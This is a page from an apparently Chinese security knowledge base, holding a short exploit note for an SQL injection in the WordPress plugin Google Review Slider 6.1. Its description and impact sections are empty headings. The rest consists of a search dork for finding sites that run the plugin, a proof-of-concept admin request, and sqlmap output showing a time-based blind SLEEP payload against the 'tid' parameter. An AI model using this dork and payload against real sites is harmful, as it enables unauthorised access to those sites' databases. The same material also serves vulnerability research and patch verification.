menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-WordPress 插件漏洞 chevron_right 001-WordPress Plugin - Google Review Slider 6.1 SQL Injection.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-WordPress Plugin - Google Review Slider 6.1 SQL Injection.md
    665 B / 2021-07-17 00:01:32
        # WordPress Plugin - Google Review Slider 6.1 SQL Injection
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    
    ```bash
    inurl:"/wp-content/plugins/wp-google-places-review-slider/"
    ```
    
    POC :
    
    
    ```bash
     GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
     &taction=edit HTTP/1.1
    ```
    
    sqlmap result
    
    
    ```bash
    sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
    ---
    Parameter: tid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
    (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
    ```
    
    links
    file_download